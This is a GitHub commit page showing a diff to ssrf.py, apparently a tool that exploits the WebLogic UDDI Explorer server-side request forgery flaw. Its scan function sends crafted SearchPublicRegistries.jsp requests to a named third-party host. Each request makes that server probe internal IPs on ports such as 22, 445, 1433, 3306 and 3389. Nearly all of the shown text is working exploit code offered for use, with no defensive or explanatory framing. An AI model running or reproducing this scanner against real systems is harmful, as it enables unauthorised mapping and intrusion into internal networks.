We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 2988ab9 commit f0b6d49Copy full SHA for f0b6d49
ssrf.py
@@ -8,7 +8,7 @@
8
def scan(ip_str):
9
ports = ('21','22','23','53','80','135','139','443','445','1080','1433','1521','3306','3389','4899','8080','7001','8000',)
10
for port in ports:
11
- exp_url = "http://weblogic.0day5.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://%s:%s&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search"%(ip_str,port)
+ exp_url = "http://weblogic.0day5.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://%s:%s&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search"%(ip_str,port)
12
try:
13
response = requests.get(exp_url, timeout=15, verify=False)
14
#SSRF判断
0 commit comments